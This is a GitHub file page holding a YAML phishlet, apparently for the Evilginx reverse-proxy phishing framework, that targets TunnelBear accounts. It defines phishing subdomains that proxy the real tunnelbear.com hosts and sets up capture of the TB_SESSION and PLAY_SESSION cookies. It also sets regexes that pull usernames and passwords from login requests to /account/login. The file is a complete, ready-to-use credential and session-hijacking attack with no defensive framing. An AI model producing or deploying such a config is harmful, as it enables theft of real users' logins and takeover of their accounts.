-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy pathTunnelbear.yaml
25 lines (23 loc) · 895 Bytes
/
Tunnelbear.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
author: '@Evi1Grey5'
min_ver: '3.0.0'
proxy_hosts:
- {phish_sub: '', orig_sub: '', domain: 'tunnelbear.com', session: true, is_landing: true, auto_filter: true}
- {phish_sub: 'prod-api-dashboard', orig_sub: 'prod-api-dashboard', domain: 'tunnelbear.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'tunnelbear.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'prod-api-core', orig_sub: 'prod-api-core', domain: 'tunnelbear.com', session: true, is_landing: false, auto_filter: true}
auth_tokens:
- domain: '.tunnelbear.com'
keys: ['TB_SESSION','PLAY_SESSION']
type: 'cookie'
credentials:
username:
key: ''
search: '"username":"([^"]*)'
type: 'json'
password:
key: ''
search: '"password":"([^"]*)'
type: 'json'
login:
domain: 'tunnelbear.com'
path: '/account/login'